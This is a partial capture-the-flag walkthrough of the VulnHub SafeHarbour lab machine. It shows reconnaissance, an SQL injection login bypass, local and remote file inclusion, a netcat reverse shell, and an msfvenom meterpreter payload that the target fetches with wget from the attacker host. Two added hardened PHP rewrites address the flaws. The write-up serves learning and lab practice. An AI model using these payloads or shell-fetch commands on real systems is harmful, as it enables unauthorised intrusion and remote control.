VulnHub SafeHarbour Target Machine Walkthrough (Partial)
SafeHarbour
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/SafeHarbour]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:f0:d6:f6 1 60 PCS Systemtechnik GmbH
192.168.56.216 08:00:27:c7:88:17 1 60 PCS Systemtechnik GmbH
Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.216.
NMAP scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/SafeHarbour]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.216 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-13 23:02 EDT
Nmap scan report for bogon (192.168.56.216)
Host is up (0.00020s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fc:c6:49:ce:9b:54:7f:57:6d:56:b3:0a:30:47:83:b4 (RSA)
| 256 73:86:8d:97:2e:60:08:8a:76:24:3c:94:72:8f:70:f7 (ECDSA)
|_ 256 26:48:91:66:85:a2:39:99:f5:9b:62:da:f9:87:4a:e6 (ED25519)
80/tcp open http nginx 1.17.4
|_http-title: Login
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: nginx/1.17.4
2375/tcp filtered docker
MAC Address: 08:00:27:C7:88:17 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.81 seconds
The NMAP scan shows that the target has 2 open ports, 22 (ssh) and 80 (http), while port 2375 (docker) is in the filtered state.
Getting a shell
Visiting port 80 in a browser returns a user login form:
Trying admin' or 1=1 -- returns the error message "username or password incorrect",
but admin' or '1'='1
logs in successfully.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/SafeHarbour]
└─$ nikto -h http://192.168.56.216
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.216
+ Target Hostname: 192.168.56.216
+ Target Port: 80
+ Start Time: 2023-03-13 23:04:41 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.17.4
+ Retrieved x-powered-by header: PHP/7.2.7
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-03-13 23:05:36 (GMT-4) (55 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
http://192.168.56.216/OnlineBanking/index.php?p=php://filter/convert.base64-encode/resource=transfer
The contents of the transfer file can be read through the local file inclusion vulnerability.
Base64-decoding gives:
<?php
session_start();
if(is_null($_SESSION["loggedin"])){
    header("Location: /");
}
$dbServer = mysqli_connect('mysql','root','TestPass123!', 'HarborBankUsers');
$user = $_SESSION["username"];
if($_POST['x']){
    $recipient = $_POST['recipient'];
    $amount = $_POST['amount'];
    $currentBalanceQueryResult = mysqli_query($dbServer, "SELECT balance FROM users where username = '$user'");
    $balanceRow = mysqli_fetch_row($currentBalanceQueryResult);
    $balance = $balanceRow[0];
    if($amount > 0 && $recipient != "Recipient"){
        if($balance > $amount){
            $recipientBalanceQueryResult = mysqli_query($dbServer, "SELECT balance FROM users where username = '$recipient'");
            $recipientBalanceRow = mysqli_fetch_row($recipientBalanceQueryResult);
            $recipientBalance = $recipientBalanceRow[0];
            $recipientNewBalance = $recipientBalance + $amount;
            $newBalance = $balance - $amount;
            if($newBalanceDBCommit = mysqli_query($dbServer, "UPDATE users SET balance = '$newBalance' WHERE username = '$user'") && $recipientNewBalanceCommit = mysqli_query($dbServer, "UPDATE users SET balance = '$recipientNewBalance' WHERE username = '$recipient'")){
                echo "<script type='text/javascript'>alert('Transfer Complete.');</script>";
            }else{
                echo "<script type = 'text/javascript'>alert('Transfer Error. Could not complete.');</script>";
            }
        }else{
            echo "<script type = 'text/javascript'>alert('Insufficient Funds for Transfer. Transaction incomplete.');</script>";
        }
    }else{
        echo "<script type = 'text/javascript'>alert('Check recipient and amount and try again.');</script>";
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Harbor Bank Online</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.css">
<style type="text/css">
.wrapper{ width: 350px; padding: 20px; margin: 0 auto;}
</style>
</head>
<body>
<h1>Harbor Bank Online</h1>
<nav class="navbar navbar-default">
<div class="container-fluid">
<div class="navbar-header">
<a class="navbar-brand" href="#"></a>
</div>
<ul class="nav navbar-nav">
<li><a href="index.php?p=welcome">Home</a></li>
<li><a href="index.php?p=balance">Balance</a></li>
<li class="active"><a href="index.php?p=transfer">Transfers</a></li>
<li><a href="index.php?p=account">My Account</a></li>
<li><a href="index.php?p=about">About</a></li>
<li><a href="index.php?p=logout" onclick="confirm('Are you sure you want to log out?')">Log Out</a></li>
</ul>
</div>
</nav>
<div class="wrapper" align="center">
<h4>Make a Transfer:</h4>
<body>
<br></br>
<br></br>
<form action="" method="post">
<div class="form-group">
<select class="form-control" name="recipient" placeholder="Recipient">
<option>Recipient</option>
<option>Admin</option>
<option>Bill</option>
<option>Steve</option>
<option>Timothy</option>
<option>Jill</option>
<option>Quinten</option>
</select>
<br></br>
<input class="form-control" type="number" placeholder="Amount" name="amount" step=".01">
<br></br>
<input type="submit" class="btn btn-primary" value="Submit" name="x">
</div>
</form>
</body>
This yields the database connection username and password.
Next, check whether there is also a remote file inclusion vulnerability.
The file name has to be about? Strange!
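The leaked transfer.php above builds its SQL by string interpolation of $user and $recipient, runs the two balance UPDATEs as separate statements, and keeps the MySQL root password in a file the LFI can read. As an added example (not the target's code), this is a hardened rewrite of that logic using prepared statements and a single transaction; it assumes the same users(username, balance) schema and that DB_USER/DB_PASS are supplied via the environment (assumed variable names).

```php
<?php
// Added hardened rewrite of the leaked transfer logic (not the target's own code).
// Assumes the same users(username, balance) table in HarborBankUsers and that
// $_SESSION["username"] was set by a genuine login check.
session_start();
if (empty($_SESSION["loggedin"])) {   // empty() also covers an unset key
    header("Location: /");
    exit;                             // the original kept executing after the redirect header
}
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
// Credentials from the environment instead of a root password hard-coded in a readable file
$db = new mysqli('mysql', getenv('DB_USER'), getenv('DB_PASS'), 'HarborBankUsers');

function transfer(mysqli $db, string $from, string $to, string $amountRaw): string {
    // Validate before touching the database: positive amount, at most two decimals, not to self
    if (!preg_match('/^\d{1,10}(\.\d{1,2})?$/', $amountRaw) || (float)$amountRaw <= 0 || $to === $from) {
        return 'Check recipient and amount and try again.';
    }
    $amount = (float)$amountRaw;
    $db->begin_transaction();
    try {
        // Bound parameters replace "... username = '$recipient'" string building;
        // FOR UPDATE locks both rows so two concurrent transfers cannot double-spend
        $sel = $db->prepare("SELECT balance FROM users WHERE username = ? FOR UPDATE");
        $sel->bind_param('s', $from);
        $sel->execute();
        $senderRow = $sel->get_result()->fetch_row();
        $sel->bind_param('s', $to);
        $sel->execute();
        $recipientRow = $sel->get_result()->fetch_row();
        if (!$senderRow || !$recipientRow || (float)$senderRow[0] < $amount) {
            $db->rollback();
            return 'Insufficient Funds for Transfer. Transaction incomplete.';
        }
        // Arithmetic happens in SQL, and both updates commit together or not at all
        $upd = $db->prepare("UPDATE users SET balance = balance - ? WHERE username = ?");
        $upd->bind_param('ds', $amount, $from);
        $upd->execute();
        $upd = $db->prepare("UPDATE users SET balance = balance + ? WHERE username = ?");
        $upd->bind_param('ds', $amount, $to);
        $upd->execute();
        $db->commit();
        return 'Transfer Complete.';
    } catch (mysqli_sql_exception $e) {
        $db->rollback();
        return 'Transfer Error. Could not complete.';
    }
}
if (isset($_POST['x'])) {
    $msg = transfer($db, $_SESSION["username"], (string)($_POST['recipient'] ?? ''), (string)($_POST['amount'] ?? ''));
    echo "<script>alert(" . json_encode($msg) . ");</script>"; // json_encode keeps the text inside the JS string
}
```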
192.168.56.216/OnlineBanking/index.php?p=http://192.168.56.146:8000/about
The .php extension is not needed, so index.php evidently appends it to the p parameter itself.
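Both the php://filter read of transfer and the remote include of about go through the same unvalidated p parameter. As an added example (not the target's code), here is an allowlisted page loader that closes both the local and the remote inclusion; it assumes index.php did roughly include($_GET['p'] . '.php') and that the page files live in a pages/ directory (assumed layout).

```php
<?php
// Added hardened version of the index.php?p= page loader exploited above (not the target's code).
// Assumes index.php did roughly include($_GET['p'] . '.php'), which is what the php://filter read
// and the remote include of "about" without an extension indicate.
const PAGES = ['welcome', 'balance', 'transfer', 'account', 'about', 'logout']; // the nav links above

function resolvePage(?string $p): string {
    // Strict allowlist match: php://, http://, ../ or any unknown value falls back to welcome
    $page = $p ?? 'welcome';
    if (!in_array($page, PAGES, true)) {
        // Log the rejected value (truncated) so LFI/RFI probing shows up in the error log
        error_log('rejected page parameter: ' . substr($page, 0, 200));
        $page = 'welcome';
    }
    // Path is built only from constants, never from request data (pages/ directory is assumed)
    return __DIR__ . '/pages/' . $page . '.php';
}

// Defence in depth, in php.ini: allow_url_include = Off (and allow_url_fopen = Off if unused),
// so a stream wrapper could not be included even if validation were bypassed.
$requested = isset($_GET['p']) && is_string($_GET['p']) ? $_GET['p'] : null; // p[]=x would be an array
include resolvePage($requested);
```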
┌──(kali㉿kali)-[~/Desktop/Vulnhub/SafeHarbour]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.216] 58850
Linux 707af7b0d61f 4.15.0-65-generic #74-Ubuntu SMP Tue Sep 17 17:06:04 UTC 2019 x86_64 Linux
sh: w: not found
uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)
/bin/sh: can't access tty; job control turned off
/ $ id
uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)
/ $ which python
/ $ which python3
/ $ bash -i
/ $ /bin/sh: bash: not found
id
uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)
/tmp $ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
21: eth0@if22: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP
link/ether 02:42:ac:14:00:08 brd ff:ff:ff:ff:ff:ff
inet 172.20.0.8/16 brd 172.20.255.255 scope global eth0
valid_lft forever preferred_lft forever
┌──(kali㉿kali)-[~/Desktop/Vulnhub/SafeHarbour]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.146 LPORT=4242 -f elf > reverseshell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
┌──(kali㉿kali)-[~/Desktop/Vulnhub/SafeHarbour]
└─$ ls
about.php linpeas.sh nmap_full_scan req.txt reverseshell.elf test
tmp $ wget http://192.168.56.146:8000/reverseshell.elf
Connecting to 192.168.56.146:8000 (192.168.56.146:8000)
reverseshell.elf 100% |*******************************| 207 0:00:00 ETA